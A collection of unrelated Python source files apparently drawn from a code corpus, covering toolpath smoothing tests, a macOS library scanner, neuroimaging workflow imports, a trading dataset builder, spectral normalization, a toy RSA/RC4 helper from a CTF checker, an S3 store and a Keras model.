assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 100 + np.linalg.norm([100, 1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(100 + np.linalg.norm([100, 1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_short_lines(plotter): data = generate_curves([ "G1 X10 Y0", "G1 X20 Y0.1" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="middle") corner_segment(data, l=0, s=1, start="middle", end="middle") straight_segment(data, l=1, s=2, start="middle", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(10 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_shorter_and_longer_line(plotter): data = generate_curves([ "G1 X10 Y0", "G1 X30 Y0.1" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="middle") corner_segment(data, l=0, s=1, start="middle", end="on") straight_segment(data, l=1, s=2, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 10 + np.linalg.norm([20, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(10 + np.linalg.norm([20, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_obtuse_corner_with_longer_and_shorter_line(plotter): data = generate_curves([ "G1 X20 Y0", "G1 X30 Y-0.1" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 3 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="middle") straight_segment(data, l=1, s=2, start="middle", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 20 + np.linalg.norm([10, 0.1]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(20 + np.linalg.norm([10, 0.1]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X100 Y100", "G1 X0 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="on") corner_segment(data, l=1, s=3, start="on", end="on") straight_segment(data, l=2, s=4, start="on", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(300, abs=0.1) check_distances(data) plotter(data) def test_three_short_lines(plotter): data = generate_curves([ "G1 X10 Y0", "G1 X20 Y0.1", "G1 X30 Y0.3" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start="start", end="middle") corner_segment(data, l=0, s=1, start="middle", end="middle") # Note that this line is very short straight_segment(data, l=1, s=2, start="middle", end="middle") corner_segment(data, l=1, s=3, start="middle", end="middle") straight_segment(data, l=2, s=4, start="middle", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) <\ 10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]) assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(10 + np.linalg.norm([10, 0.1]) + np.linalg.norm([10, 0.2]), abs=0.1) check_distances(data) plotter(data) def test_three_long_lines_with_z_move(plotter): data = generate_curves([ "G1 X100 Y0", "G1 X100 Y100", "G1 Z10", "G1 X0 Y100" ], maximum_error=0.01) assert data.smoothed_toolpath.segment_start.shape[0] == 5 straight_segment(data, l=0, s=0, start="start", end="on") corner_segment(data, l=0, s=1, start="on", end="on") straight_segment(data, l=1, s=2, start="on", end="end") straight_segment(data, l=1, s=3, start="end", end="end") straight_segment(data, l=3, s=4, start="start", end="end") assert np.sum(data.smoothed_toolpath.segment_lengths) < 300 assert np.sum(data.smoothed_toolpath.segment_lengths) == \ pytest.approx(300, abs=0.1) check_distances(data) plotter(data)
2.15625
2
appify/scan.py
akx/appify
0
12796576
import subprocess import threading from collections import defaultdict from concurrent.futures import Executor from concurrent.futures.thread import ThreadPoolExecutor class RecursiveLibraryScanner: def __init__(self, executor: Executor, scan_private: bool): self.executor = executor self.libraries = defaultdict(set) self.scanned = set() self.scan_private = scan_private self.jobs = [] self.all_done = threading.Event() def _check(self, job): if all(j.done() for j in self.jobs): self.all_done.set() def _enqueue(self, target): job = self.executor.submit(self._scan, target) job.add_done_callback(self._check) self.jobs.append(job) def _scan(self, target): # print("scanning", target, file=sys.stderr) self.scanned.add(target) for lib in scan_libraries(target): self.libraries[target].add(lib) if lib not in self.scanned: is_private = smells_private(lib) if (is_private and self.scan_private) or not is_private: self._enqueue(lib) def scan(self, target): self._enqueue(target) self.all_done.wait() return self.libraries def scan_libraries_recursive(initial_target, scan_private=True): with ThreadPoolExecutor() as executor: rls = RecursiveLibraryScanner(executor, scan_private=scan_private) return rls.scan(initial_target) def scan_libraries(target): in_load_dylib = False libraries = set() for line in subprocess.check_output( ["otool", "-l", target], encoding="utf-8" ).splitlines(): line = line.strip() if line == "cmd LC_LOAD_DYLIB": in_load_dylib = True if in_load_dylib and line.startswith("name "): words = line.split() lib = words[1] libraries.add(lib) in_load_dylib = False return libraries def smells_private(lib): if lib.startswith("/System/Library"): return True if lib.startswith("/usr/lib/"): return True if lib.startswith("/usr/local/lib/"): return True return False def filter_private(scanned_libraries): public_libraries = { target: {lib for lib in libraries if not smells_private(lib)} for (target, libraries) in scanned_libraries.items() if not smells_private(target) } return public_libraries
2.5625
3
aslprep/workflows/asl/__init__.py
lawlessrd/aslprep
2
12796577
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*- # vi: set ft=python sts=4 ts=4 sw=4 et: """ Pre-processing ASL - ASL signal workflows ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ .. automodule:: aslprep.workflows.asl.base .. automodule:: aslprep.workflows.asl.hmc .. automodule:: aslprep.workflows.asl.stc .. automodule:: aslprep.workflows.asl.t2s .. automodule:: aslprep.workflows.asl.registration .. automodule:: aslprep.workflows.asl.resampling .. automodule:: aslprep.workflows.asl.confounds .. automodule:: aslprep.workflows.asl.cbf """ from .base import init_asl_preproc_wf from .gecbf import init_asl_gepreproc_wf from .hmc import init_asl_hmc_wf from .stc import init_asl_stc_wf from .t2s import init_asl_t2s_wf from .registration import ( init_asl_t1_trans_wf, init_asl_reg_wf, ) from .resampling import ( init_asl_std_trans_wf, init_asl_surf_wf, init_asl_preproc_trans_wf, ) from .confounds import ( init_asl_confs_wf ) from .cbf import ( init_cbf_compt_wf, init_cbfqc_compt_wf, init_cbfplot_wf, init_gecbfplot_wf, init_cbfroiquant_wf, init_gecbf_compt_wf, init_cbfgeqc_compt_wf) from .ge_utils import (init_asl_geref_wf, init_asl_gereg_wf, init_asl_t1_getrans_wf,init_asl_gestd_trans_wf) __all__ = [ 'init_asl_confs_wf', 'init_gecbf_compt_wf', 'init_asl_t1_getrans_wf', 'init_asl_geref_wf', 'init_asl_gereg_wf', 'init_asl_gestd_trans_wf', 'init_asl_hmc_wf', 'init_asl_std_trans_wf', 'init_asl_preproc_trans_wf', 'init_asl_reg_wf', 'init_asl_stc_wf', 'init_asl_surf_wf', 'init_asl_t1_trans_wf', 'init_asl_t2s_wf', 'init_asl_preproc_wf', 'init_cbf_compt_wf', 'init_cbfqc_compt_wf', 'init_cbfplot_wf', 'init_cbfroiquant_wf', 'init_cbfgeqc_compt_wf' ]
1.953125
2
keepworking/settings.py
yelijing18/KeepWorking
0
12796578
<gh_stars>0 # -*- coding: utf-8 -*- from decouple import config from dotenv import load_dotenv, find_dotenv load_dotenv(find_dotenv('.env', usecwd=True)) load_dotenv(find_dotenv('default.env', raise_error_if_not_found=True)) COUNTDOWN = config('COUNTDOWN', default=5, cast=int) EVENT_INTERVAL = config('EVENT_INTERVAL', default=1, cast=int)
1.5
2
convert_png_images_using_clahe.py
tybrad11/kaggle_ich
0
12796579
<gh_stars>0 #!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Wed Aug 21 14:21:03 2019 @author: tjb129 """ import numpy as np from PIL import Image from skimage.exposure import equalize_adapthist import os from matplotlib import pyplot as plt parent = '/data/Kaggle' folders = [ 'pos-all-png', 'test-png', 'train-png', 'neg-filt-png', 'pos-filt-png'] for dir_i in folders: dir_i = os.path.join(parent, dir_i) save_dir = dir_i + '-clahe' if not os.path.exists(save_dir): os.mkdir(save_dir) for f in os.listdir(dir_i): fname = os.fsdecode(f) if fname.endswith(".png"): im = np.array(Image.open(os.path.join(dir_i, fname))) if len(im.shape) > 2: im = im[..., 0] im = im.astype(np.float) # normalize to [0,1] im /= 255. im = equalize_adapthist(im) im = np.uint8(im*255) im2 = Image.fromarray(im) im2.save(os.path.join(save_dir, fname))
2.203125
2
datamodeling/dscreator.py
AI-Traiding-Team/paired_trading
1
12796580
<reponame>AI-Traiding-Team/paired_trading import os import sys import time import copy import pytz import numpy as np import datetime import pandas as pd from typing import Tuple from sklearn.preprocessing import StandardScaler from sklearn.preprocessing import MinMaxScaler from sklearn.preprocessing import RobustScaler from sklearn.preprocessing import LabelEncoder from sklearn.preprocessing import LabelBinarizer from sklearn.preprocessing import OneHotEncoder from sklearn.preprocessing import FunctionTransformer from tensorflow.keras.preprocessing.sequence import TimeseriesGenerator import matplotlib.pyplot as plt import seaborn as sns import tensorflow as tf from dataclasses import dataclass from analyze.dataload import DataLoad from datamodeling.datafeatures import DataFeatures, DSProfile __version__ = 0.0010 def get_local_timezone_name(): if time.daylight: offset_hour = time.altzone / 3600 else: offset_hour = time.timezone / 3600 offset_hour_msg = f"{offset_hour:.0f}" if offset_hour > 0: offset_hour_msg = f"+{offset_hour:.0f}" return f'Etc/GMT{offset_hour_msg}' class TSDataGenerator(TimeseriesGenerator): def __init__(self, data, targets, length, sampling_rate=1, stride=1, start_index=0, overlap=0, end_index=None, shuffle=False, reverse=False, batch_size=128): super().__init__(data, targets, length, sampling_rate, stride, start_index, end_index, shuffle, reverse, batch_size) if len(data) != len(targets): raise ValueError('Data and targets have to be' + ' of same length. ' 'Data length is {}'.format(len(data)) + ' while target length is {}'.format(len(targets))) if overlap >= length: raise ValueError(f'`overlap={overlap} >= length={length}` is disallowed') if overlap > 0: start_index += overlap self.data = data self.targets = targets self.length = length self.sampling_rate = sampling_rate self.stride = stride self.start_index = start_index + length self.overlap = overlap if end_index is None: end_index = len(data) - 1 self.end_index = end_index self.shuffle = shuffle self.reverse = reverse self.batch_size = batch_size self.sample_shape = None if self.start_index > self.end_index: raise ValueError('`start_index+length=%i > end_index=%i` ' 'is disallowed, as no part of the sequence ' 'would be left to be used as current step.' % (self.start_index, self.end_index)) self.sample_shape = self.calc_shape() pass def calc_shape(self): index = 0 i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = np.expand_dims(samples, axis=0).shape sample_shape = (samples.shape[-2], samples.shape[-1],) return sample_shape def __getitem__(self, index): if self.shuffle: rows = np.random.randint( self.start_index, self.end_index + 1, size=self.batch_size) else: i = (self.start_index + self.batch_size * self.stride * index) rows = np.arange(i, min(i + self.batch_size * self.stride, self.end_index + 1), self.stride) samples = np.array([self.data[row - self.overlap - self.length:row:self.sampling_rate] for row in rows]) # self.sample_shape = samples.shape targets = np.array([self.targets[row] for row in rows]) if self.reverse: return samples[:, ::-1, ...], targets return samples, targets @dataclass class DataSet: def __init__(self): self.name: str = '' self.dataset_profile = DSProfile() self.features_df = None self.y_df = None self.x_Train = None self.y_Train = None self.x_Val = None self.y_Val = None self.x_Test = None self.y_Test = None self.features_scaler = object self.targets_scaler = object self.train_gen = None self.val_gen = None self.test_gen = None self.input_shape = None pass def get_train(self): if (self.x_Train is not None) and (self.y_Train is not None): return self.x_Train, self.y_Train def get_val(self): if (self.x_Val is not None) and (self.y_Val is not None): return self.x_Val, self.y_Val def get_test(self): if (self.x_Test is not None) and (self.y_Test is not None): return self.x_Test, self.y_Test class DSCreator: """ Class for dataset creation for dataset configuration we are using DSConstants dataclass (profile) """ def __init__(self, loader: DataLoad, dataset_profile: DSProfile): """ Getting object with OHLCV data (symbols and timeframes). All data with chosen period loaded to memory Args: loader (DataLoad): object with data Returns: DSCreator (class): object """ self.features = DataFeatures(loader) self.dataset_profile = dataset_profile self.dataset = DataSet() def split_data_df(self): df_rows = self.dataset.features_df.shape[0] df_train_len = int(df_rows * self.dataset_profile.train_size) df_val_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) self.dataset.train_df = self.dataset.features_df.iloc[:df_train_len, :] if self.dataset_profile.train_size + self.dataset_profile.val_size == 1.0: self.dataset.val_df = self.dataset.features_df.iloc[df_train_len + self.dataset_profile.gap_timeframes:, :] return df_train_len, df_val_len, None else: df_val_len = int(df_rows * self.dataset_profile.val_size) df_test_len = df_rows - (df_train_len + self.dataset_profile.gap_timeframes) - (df_val_len + self.dataset_profile.gap_timeframes) self.dataset.val_df = self.dataset.features_df.iloc[ df_train_len + self.dataset_profile.gap_timeframes: df_val_len + df_train_len + self.dataset_profile.gap_timeframes, :] self.dataset.test_df = self.dataset.features_df.iloc[df_rows - df_test_len:, :] return df_train_len, df_val_len, df_test_len def get_train_generator(self, x_Train_data, y_Train_data): self.dataset.train_gen = TSDataGenerator(data=x_Train_data, targets=y_Train_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.train_gen def get_val_generator(self, x_Val_data, y_Val_data): self.dataset.val_gen = TSDataGenerator(data=x_Val_data, targets=y_Val_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.val_gen def get_test_generator(self, x_Test_data, y_Test_data): self.dataset.test_gen = TSDataGenerator(data=x_Test_data, targets=y_Test_data, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, ) return self.dataset.test_gen def create_close1_close2_power(self): if self.dataset_profile.scaler == "robust": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = "Error: Unknown scaler preparation type" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) """ check """ y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_power_trend(self): if self.dataset_profile.scaler == "robust": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = "Error: Unknown scaler preparation type" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) """ check """ y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def create_close1_close2_trend(self): if self.dataset_profile.scaler == "robust": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = None else: msg = "Error: Unknown scaler preparation type" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) """ check """ y_arr = self.dataset.y_df.values self.prepare_datagens(x_arr, y_arr) pass def prepare_datagens(self, x_arr, y_arr): train_len, val_len, test_len = self.split_data_df() if test_len is None: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[:train_len + self.dataset_profile.gap_timeframes, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[:train_len + self.dataset_profile.gap_timeframes, :] else: x_Train_data = x_arr[train_len:, :] x_Val_data = x_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] x_Test_data = x_arr[x_arr.shape[0] - test_len:, :] y_Train_data = y_arr[train_len:, :] y_Val_data = y_arr[train_len + self.dataset_profile.gap_timeframes:train_len + self.dataset_profile.gap_timeframes + val_len, :] y_Test_data = y_arr[x_arr.shape[0] - test_len:, :] x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) """ Using generator 1 time to have solid data """ self.dataset.x_Test, self.dataset.y_Test = self.create_data_from_gen(x_Test_data, y_Test_data) # x_Test_gen = self.get_test_generator(x_Test_data, y_Test_data) """ Using generator 1 time to have solid data """ x_Train_gen = self.get_train_generator(x_Train_data, y_Train_data) x_Val_gen = self.get_val_generator(x_Val_data, y_Val_data) self.dataset.x_Train, self.dataset.y_Train = self.create_data_from_gen(x_Train_data, y_Train_data) self.dataset.x_Val, self.dataset.y_Val = self.create_data_from_gen(x_Val_data, y_Val_data) self.dataset.input_shape = x_Val_gen.sample_shape pass def create_dataset(self) -> DataSet: self.dataset.dataset_profile = DSProfile() self.dataset.features_df = self.features.collect_features(self.dataset_profile) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' if self.dataset_profile.Y_data == "close1-close2": self.dataset.y_df = self.features.create_y_close1_close2_sub() elif self.dataset_profile.Y_data == "close1-close2_trend": self.dataset.y_df = self.features.create_y_close1_close2_sub_trend() self.create_close1_close2_trend() return self.dataset elif self.dataset_profile.Y_data == "close1-close2_power": self.dataset.y_df = self.features.create_y_close1_close2_sub_power() self.create_close1_close2_power() return self.dataset elif self.dataset_profile.Y_data == "power_trend": weight = self.dataset.dataset_profile.power_trend self.dataset.y_df = self.features.create_power_trend(weight) self.create_power_trend() return self.dataset else: msg = "Error: Unknown dataset preparation type" sys.exit(msg) self.dataset.name = f'{self.dataset_profile.use_symbols_pairs[0]}-{self.dataset_profile.use_symbols_pairs[1]}-{self.dataset_profile.timeframe}' y_temp = self.dataset.y_df.values.reshape(-1, 1) if self.dataset_profile.scaler == "robust": self.dataset.features_scaler = RobustScaler().fit(self.dataset.features_df.values) self.dataset.targets_scaler = RobustScaler().fit(y_temp) else: msg = "Error: Unknown scaler preparation type" sys.exit(msg) x_arr = self.dataset.features_scaler.transform(self.dataset.features_df.values) """ check """ y_arr = self.dataset.targets_scaler.transform(y_temp) self.prepare_datagens(x_arr, y_arr) return self.dataset def create_data_from_gen(self, x_arr, y_arr): gen = TSDataGenerator(data=x_arr, targets=y_arr, length=self.dataset_profile.tsg_window_length, sampling_rate=self.dataset_profile.tsg_sampling_rate, stride=self.dataset_profile.tsg_stride, start_index=self.dataset_profile.tsg_start_index, overlap=self.dataset_profile.tsg_overlap, batch_size=x_arr.shape[0] ) for x_data, y_data in gen: continue return x_data, y_data def save_dataset_arrays(self, path_filename): pass if __name__ == "__main__": """ Usage for DataLoad class ------------------------ pairs_symbol = None -> Use all pairs in timeframe directory pairs_symbol = ("BTCUSDT", "ETHUSDT") -> Use only this pairs to load time_intervals = None -> Use all timeframes directories for loading (with pairs_symbols) time_intervals = ['15m'] -> Use timeframes from this list to load start_period = None -> Use from [0:] of historical data start_period = '2021-09-01 00:00:00' -> Use from this datetimeindex end_period = None -> Use until [:-1] of historical data end_period = '2021-12-05 23:59:59' -> Use until this datetimeindex source_directory="../source_root" -> Use this directory to search timeframes directory """ loaded_crypto_data = DataLoad(pairs_symbols=None, time_intervals=['15m'], source_directory="../source_root", start_period='2021-11-01 00:00:00', end_period='2021-12-05 23:59:59', ) dataset_1_profile = DSProfile() dsc = DSCreator(loaded_crypto_data, dataset_1_profile) dataset_1_cls = dsc.create_dataset()
2.078125
2
utils/bn_sn_chen.py
sebemery/Lipschitz-constrained-neural-networks
0
12796581
<reponame>sebemery/Lipschitz-constrained-neural-networks """ Spectral Normalization borrowed from https://arxiv.org/abs/1802.05957 SN for batch normalization layers to be of Lipschtz constant sigma (default=1.0). """ import torch from torch.nn.parameter import Parameter class BatchNormSpectralNorm(object): def __init__(self, name='weight', sigma=1.0, eps=1e-12): self.name = name self.sigma = sigma self.eps = eps def compute_weight(self, module): weight = getattr(module, self.name + '_orig') bias = getattr(module, "bias_orig") running_var = getattr(module, "running_var") with torch.no_grad(): cur_sigma = torch.max(torch.abs(weight / torch.sqrt(running_var))) # print(cur_sigma) cur_sigma = max(float(cur_sigma.cpu().detach().numpy()), self.sigma) # print(cur_sigma) weight = weight / cur_sigma bias = bias / cur_sigma return weight, bias def remove(self, module): weight = getattr(module, self.name) bias = getattr(module, "bias") delattr(module, self.name) delattr(module, self.name + '_orig') delattr(module, "bias") delattr(module, "bias_orig") module.register_parameter(self.name, torch.nn.Parameter(weight.detach())) module.register_parameter("bias", torch.nn.Parameter(bias.detach())) def __call__(self, module, inputs): if module.training: weight, bias = self.compute_weight(module) setattr(module, self.name, weight) setattr(module, "bias", bias) else: weight_r_g = getattr(module, self.name + '_orig').requires_grad bias_r_g = getattr(module, "bias_orig").requires_grad getattr(module, self.name).detach_().requires_grad_(weight_r_g) getattr(module, "bias").detach_().requires_grad_(bias_r_g) @staticmethod def apply(module, name, sigma, eps): fn = BatchNormSpectralNorm(name, sigma, eps) weight = module._parameters[name] bias = module._parameters["bias"] delattr(module, fn.name) delattr(module, "bias") module.register_parameter(fn.name + "_orig", weight) module.register_parameter("bias_orig", bias) # We still need to assign weight back as fn.name because all sorts of # things may assume that it exists, e.g., when initializing weights. # However, we can't directly assign as it could be an nn.Parameter and # gets added as a parameter. Instead, we register weight.data as a # buffer, which will cause weight to be included in the state dict # and also supports nn.init due to shared storage. module.register_buffer(fn.name, weight.data) module.register_buffer("bias", bias.data) module.register_forward_pre_hook(fn) return fn def bn_spectral_norm(module, name='weight', sigma=1.0, eps=1e-12): r"""Applies spectral normalization to a parameter in the given module. .. math:: \mathbf{W} &= \dfrac{\mathbf{W}}{\sigma(\mathbf{W})} \\ \sigma(\mathbf{W}) &= \max_{\mathbf{h}: \mathbf{h} \ne 0} \dfrac{\|\mathbf{W} \mathbf{h}\|_2}{\|\mathbf{h}\|_2} Spectral normalization stabilizes the training of discriminators (critics) in Generaive Adversarial Networks (GANs) by rescaling the weight tensor with spectral norm :math:`\sigma` of the weight matrix calculated using power iteration method. If the dimension of the weight tensor is greater than 2, it is reshaped to 2D in power iteration method to get spectral norm. This is implemented via a hook that calculates spectral norm and rescales weight before every :meth:`~Module.forward` call. See `Spectral Normalization for Generative Adversarial Networks`_ . .. _`Spectral Normalization for Generative Adversarial Networks`: https://arxiv.org/abs/1802.05957 Args: module (nn.Module): containing module name (str, optional): name of weight parameter eps (float, optional): epsilon for numerical stability in calculating norms Returns: The original module with the spectal norm hook Example:: >>> m = batchnorm_spectral_norm(nn.BatchNorm2d(10)) BatchNorm2d(10, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True) >>> m.weight_orig.size() torch.Size([10]) """ BatchNormSpectralNorm.apply(module, name, sigma, eps) return module def remove_bn_spectral_norm(module, name='weight'): r"""Removes the spectral normalization reparameterization from a module. Args: module (nn.Module): containing module name (str, optional): name of weight parameter Example: >>> m = spectral_norm(nn.Linear(40, 10)) >>> remove_spectral_norm(m) """ for k, hook in module._forward_pre_hooks.items(): if isinstance(hook, BatchNormSpectralNorm) and hook.name == name: hook.remove(module) del module._forward_pre_hooks[k] return module raise ValueError("spectral_norm of '{}' not found in {}".format( name, module))
2.625
3
checkers/kettle/libsimplecrypto.py
SharLike-CTF-Team/altayctf-2019
7
12796582
import time import base64 import binascii from secrets import token_hex from rsa import prime from arc4 import ARC4 def gcd(a, b): while b != 0: a, b = b, a % b return a def lcm(a, b): return a * b // gcd(a, b) def imod(a, n): i = 1 while True: c = n * i + 1 if(c % a == 0): c = c//a break i = i+1 return c def arc4_encrypt(key, message): arc4 = ARC4(key) cipher = arc4.encrypt(message) return cipher def arc4_decrypt(key, cipher): arc4 = ARC4(key) plain = arc4.decrypt(cipher) return plain class SimpleRSA: def __init__(self, bit_length=256): p, q = 0, 0 while p == q: p = prime.getprime(bit_length) q = prime.getprime(bit_length) self.p = p self.q = q self.N = self.p*self.q self.phi = lcm(self.p - 1, self.q - 1) self.e = 65537 self.d = imod(self.e, self.phi) def dump(self): return (self.p, self.q, self.N, self.phi, self.e, self.d) def load(self, p, q, N, phi, e, d): self.p = p self.q = q self.N = N self.phi = phi self.e = e self.d = d def get_pub(self): return (self.N, self.e) def get_priv(self): return (self.N, self.d) def encrypt(self, m, other_pubkey): if not isinstance(m, int): m = int(binascii.hexlify(m.encode())) return pow(m, other_pubkey[1], other_pubkey[0]) def decrypt(self, c): res = pow(c, self.d, self.N) return binascii.unhexlify(str(res)) class Cipher(SimpleRSA): def __init__(self, params): self.p = params['p'] self.q = params['q'] self.N = params['N'] self.phi = params['phi'] self.e = params['e'] self.d = params['d'] def decrypt_request(self, tmpkey, message): k = self.decrypt(tmpkey) message = arc4_decrypt(k, message) return message def encrypt_response(self, user_key, message): tmpkey = token_hex(nbytes=10) other_key = (user_key['user_key']['N'], user_key['user_key']['e']) enc_key = self.encrypt(tmpkey, other_key) cipher = arc4_encrypt(tmpkey, message) return dict( key=enc_key, data=str(base64.b64encode(cipher))[2:-1] ) if __name__ == "__main__": pass
2.625
3
src/datastore/persistence_store.py
dgpatelgit/fabric8-analytics-bigquery-manifests-job
0
12796583
# Copyright © 2020 Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Author: <NAME> <<EMAIL>> # """Implementation persistence store using S3.""" import logging from rudra.data_store.aws import AmazonS3 from src.config.settings import SETTINGS, AWS_SETTINGS logger = logging.getLogger(__name__) class PersistenceStore: """Persistence store to save Bigquery Data, it uses AWS S3 as of now as data store.""" def __init__(self, s3_client=None): """Initialize DataProcessing object.""" self.s3_client = s3_client if s3_client: self.s3_client = s3_client else: self.s3_client = AmazonS3( region_name=AWS_SETTINGS.s3_region, bucket_name=AWS_SETTINGS.s3_bucket_name, aws_access_key_id=AWS_SETTINGS.s3_access_key_id, aws_secret_access_key=AWS_SETTINGS.s3_secret_access_key, local_dev=not SETTINGS.use_cloud_services ) def update(self, data, bucket_name, filename='collated.json'): """Upload s3 bucket.""" # connect after creating or with existing s3 client self.s3_client.connect() if not self.s3_client.is_connected(): raise Exception('Unable to connect to s3.') json_data = dict() if self.s3_client.object_exists(filename): logger.info('%s exists, updating it.', filename) json_data = self.s3_client.read_json_file(filename) if not json_data: raise Exception(f'Unable to get the json data path:{bucket_name}/{filename}') json_data.update(data) self.s3_client.write_json_file(filename, json_data) logger.info('Updated file Succefully!')
1.96875
2
methods/model_n.py
behrouzsh/deepPhosAPI
0
12796584
<filename>methods/model_n.py import functools import itertools import os import random import matplotlib matplotlib.use('Agg') import matplotlib.pyplot as plt import numpy as np from sklearn import metrics from sklearn import preprocessing from sklearn.model_selection import train_test_split, KFold, cross_val_score from keras.layers import Dense, Activation, Flatten, Dropout, Reshape from keras.layers import Conv1D, Conv2D, MaxPooling2D from keras.models import Sequential, Model from keras.utils.np_utils import to_categorical from keras import optimizers from keras.optimizers import Adam, SGD from keras.layers.normalization import BatchNormalization from keras.regularizers import l2 import copy def model_net(X_train1, X_train2, X_train3, y_train, nb_epoch=60,weights=None): nb_classes = 2 img_dim1 = X_train1.shape[1:] img_dim2 = X_train2.shape[1:] img_dim3 = X_train3.shape[1:] ##########parameters######### init_form = 'RandomUniform' learning_rate = 0.001 nb_dense_block = 1 nb_layers = 5 nb_filter = 32 growth_rate = 32 # growth_rate = 24 filter_size_block1 = 13 filter_size_block2 = 7 filter_size_block3 = 3 filter_size_ori = 1 dense_number = 32 dropout_rate = 0.2 dropout_dense = 0.3 weight_decay = 0.0001 nb_batch_size = 512 ################### # Construct model # ################### from methods.phosnet import Phos model = Phos(nb_classes, nb_layers, img_dim1, img_dim2, img_dim3, init_form, nb_dense_block, growth_rate, filter_size_block1, filter_size_block2, filter_size_block3, nb_filter, filter_size_ori, dense_number, dropout_rate, dropout_dense, weight_decay) # Model output # choose optimazation opt = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08) # model compile model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy']) # load weights# if weights is not None: model.load_weights(weights) # model2 = copy.deepcopy(model) model2 = model model2.load_weights(weights) for num in range(len(model2.layers) - 1): model.layers[num].set_weights(model2.layers[num].get_weights()) if nb_epoch > 0 : model.fit([X_train1, X_train2, X_train3], y_train, batch_size=nb_batch_size, # validation_data=([X_val1, X_val2, X_val3, y_val), # validation_split=0.1, epochs= nb_epoch, shuffle=True, verbose=1) return model
2.4375
2
models/MAF.py
mahkons/Dreamer
0
12796585
